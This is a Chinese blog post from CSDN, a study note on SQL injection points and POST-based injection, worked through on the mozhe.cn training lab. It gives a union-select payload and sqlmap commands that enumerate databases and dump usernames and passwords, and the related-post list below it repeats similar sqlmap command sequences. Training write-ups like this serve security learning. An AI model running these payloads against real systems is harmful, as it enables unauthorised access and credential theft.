SQL注入-产生位置+post注入+sqlmap

已于 2023-06-29 19:30:22 修改
阅读量341 收藏 1
点赞数
分类专栏: SQL注入漏洞合集 文章标签: sql web安全
于 2023-06-28 07:54:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51345235/article/details/131428869
版权

      

数据请求方式-GET&POST&COOKIE等

——url没有参数并不代表没有注入,有时会在数据包中,http数据包中每个部分只要可以被接收,都可能产生漏洞

 

get参数传递位置

post参数传递位置

cookie参数传递位置

request参数传递位置:可以在GET&POST&COOKIE三个位置传递

 

 

 

1.后台要记录访问的ip

IP会写到数据库,如果能自定义ip数据(X_Forwarded_For),就可以尝试sql注入

 

 

2.网站根据用户的访问设备给予显示页面

数据库将各种UA信息整理保存,用户访问后数据库会获取用户的UA信息进行对比,涉及到数据库查询操作。就可以更改UA信息进行SQL注入

 

 

sql注入案例

实例黑盒-用户登录-POST注入

打开——墨者(mozhe.cn)SQL注入漏洞测试(post)

burp抓取登录包

使用--+测试发现页面报错

使用#测试发现页面正常,说明支持#注释

测试出字段数后,输入' and 1=2 union select 1,2,3#测试显错位,结果直接爆出了key

 

使用sqlmap工具

sqlmap数据包形式注入

将name参数值设置为*name=123*),将数据包保存为1.txt,执行命令:python sqlmap.py -r 1.txt --dbs 

依次查询""——""——"字段".

最后查询指定字段数据:

python sqlmap.py -r 1.txt --dump -C "name,password" -T "StormGroup_member" -D "mozhe_Discuz_StormGroup"

成功查询出账号密码

 

 

 

还有一种方式,不用保存数据包,可以直接扫描,就是使用--data参数

--data        #通过post发送数据

抓取登录数据包,右键copy要扫描的url,然后将数据包中的两个post参数复制放到--data后面

命令:python sqlmap.py -u "http://124.70.71.251:42179/login.php" --data "name=1&password=1" --dbs  成功爆出数据库

 

如果在--data后面的其中一个参数加上*号,就只会测试加*号的参数,如果没有加*号就会测试全部参数

当然在这里还是建议使用数据包形式的注入方式,不容易出错。

 

注入总结:

数据库类型决定——攻击的手法和payload样式

不同数据类型注入——payload要考虑闭合、数据格式

各种提交方式——数据请求不同,注入需要按照指定的方式去测试

网站url没有参数不代表没有注入,有些数据会在数据包才有体现

http数据包任何一个地方只要数据被接收,就可能产生漏洞

 

 

 

 

 

 

 

 

 

 

 

 

 

 

      

xiaoheizi安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
利用sqlmap进行POST注入
ChuMeng1999的博客
01-19 1万+
目录预备知识了解SqlmapPOST注入形成的原因实验目的实验环境实验步骤一使用sqlmap进行POST注入实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 POST注入形成的原因 POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4543
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
史上最详细sqlmap入门教程_sqlmap使用教程(1)
最新发布
2401_84253037的博客
04-27 912
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2912
使用sqlmap进行post注入学习笔记
sqlmap使用教程
weixin_57048716的博客
11-26 1723
常用步骤: 1.探测数据库名 --dbs --batch 2.探测表名 -D 库名 --tables --batch 3.探测字段名 -D 库名 -T 表名 --columns --batch 4.探测字段值 -D 库名 -T 表名 -C username(字段),password --dump --batch
sql注入靶场中POST注入和HTTP头部注入
weixin_75055385的博客
06-26 243
sql注入post注入以及HTTP头部注入原理和靶场的联系,我也是小白,有错误的地方,希望各位师傅们指点出来,非常感谢
sql注入工具sqlmap源代码+常用指令
04-09
SQLMap是一款流行的开源SQL注入工具,用于自动化检测和利用Web应用程序中的SQL注入漏洞。它可以测试目标站点是否存在SQL注入漏洞,并探测数据库类型、操作系统、表名、列名等信息,进而将这些信息自动化地利用来获取...
第九节 Sqlmap注入位置介绍-01
09-15
Sqlmap 注入位置介绍 Sqlmap 是一个开源的 penetration testing工具,旨在检测和利用 SQL...通过设置指定的注入参数和注入位置Sqlmap 可以模拟多种攻击场景,从而帮助开发者和安全测试人员检测和修复 SQL 注入漏洞。
SQLMAP注入使用
05-13
3. python SQLmap.py -u "xxxx.com" --data "xx=xx&xx=xx" 【判断url是否存在post注入】 该命令用于判断目标网站是否存在POST注入漏洞。 GET注入详解: * python sqlmap.py -u "xxxxxxx.com" --dbs 【获取数据库...
第十二节 POST update语句注入-01
09-15
在数据库安全领域中,SQL 注入是一种常见的攻击方式,而在 Web 应用程序中,POST 请求也可能存在 SQL 注入漏洞。今天我们将讨论 POST update 语句注入的相关知识点。 MySQL update 介绍 MySQL 的 update 语句用于...
Sql注入平台.zip
02-21
一个在本地搭建的SQL注入的平台,能够进行SQL注入,适用于GET和POST场景 包含了基于union查询的注入、基于报错的注入、基于floor的报错注入、基于boolean的盲注、基于时间的盲注……
SQL注入--POST注入
weixin_52151447的博客
11-19 3636
post注入与get注入区别在于POST注入在传参时不会将
墨者学院——SQL注入漏洞测试(POST)
2303_76679642的博客
04-23 641
6.找字段内容“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 -C (字段1,字段2,....) --dump --dbms mysql --batch”5.找数据库表里面的字段“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 --columns --dbms mysql --batch”测试环境为Kali Linux。
sql注入靶场安装/POST注入基础/一看就会
ChenD的学习笔记
10-05 785
SQL注入(二)post注入方法
SQL注入---POST注入
zhoutong2323的博客
04-07 695
Webshell文章中介绍过post提交和get提交的区别,这里不再赘述get方式提交URL中的参数信息,post方式则是将信息保存在HTTP请求的body中传递get提交的参数可以被缓存并会保留在浏览器的历史记录里,post提交不会。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
sql学习3(sqlmap的使用)
cyy001128的博客
04-03 567
接上一篇学习2。
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
A_991128a的博客
09-07 1104
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
SQL注入漏洞-POST注入
HacHunter的博客
03-06 2537
POST是HTTP/1.1协议中的一种资源请求方法。其向指定资源提交数据,请求服务器进行处理(例如提交表单或者上传文件)。数据被包含在请求本文中。这个请求可能会创建新的资源或修改现有资源,或二者皆有。 在很大一部分的表单都是通过POST方式发送到处理页面的。 显错注入 关键代码为: 构造语句来显示所有的用户名和密码 ’OR 1# 关键代码为: 正常輸入因為數據庫里沒有所以查不到任何數據,而要查看到所有數據就需要使條件變為true 构造语句来显示所有的用户名和密码 "..
sql注入漏洞
weixin_49472648的博客
04-27 3285
SQL注入漏洞 文章目录SQL注入漏洞一、SQL注入原理实现注入攻击的两个关键条件(重点)二、SQL注入危害三、SQL注入防御四、SQL注入分类五、SQL注入流程流程细节六、手工注入实例1、判断是否存在SQL注入点2、判断注入类型3、判断字段数4、判断回显位置5、判断数据库名6、确定表名7、确定字段名8、获取用户名与密码9、MD5解密—破解密码七、sqlmap注入实例1、判断是否存在注入点2、爆数据库名3、指定库名,列出所有元素4、指定库名、表名,列出所有字段5、指定库名、表名、字段名,列出指定字段 一、S
sql注入sqlmap
11-11
SQL注入是一种常见的Web应用程序漏洞,攻击者可以利用这种漏洞来获取敏感信息或者执行未经授权的操作。而Sqlmap是一款开源的自动化SQL注入工具,可以帮助安全测试人员快速检测和利用SQL注入漏洞。以下是使用Sqlmap进行SQL注入检测的步骤: 1. 确认目标网站存在SQL注入漏洞,可以通过手工注入或者使用Sqlmap进行检测。 2. 下载并安装Sqlmap,可以从官网(https://sqlmap.org/)下载最新版本。 3. 打开命令行窗口,进入Sqlmap所在的目录。 4. 输入以下命令进行基本格式的检测: ``` sqlmap -u "http://www.vuln.cn/post.php?id=1" ``` 其中,-u参数指定目标URL,id=1表示注入点的参数为id。 5. 如果需要指定数据库类型和检测级别,可以使用--dbms和--level参数,例如: ``` sqlmap -u "http://www.vuln.cn/post.php?id=1" --dbms mysql --level 3 ``` 其中,--dbms参数指定数据库类型为mysql,--level参数指定检测级别为3。 6. 如果目标网站存在302跳转,可以使用--follow-redirects参数进行跟随,例如: ``` sqlmap -u "http://www.vuln.cn/post.php?id=1" --follow-redirects ``` 7. Sqlmap会自动检测注入点的类型,并尝试利用不同的注入技术进行攻击,如果成功,会输出相应的结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值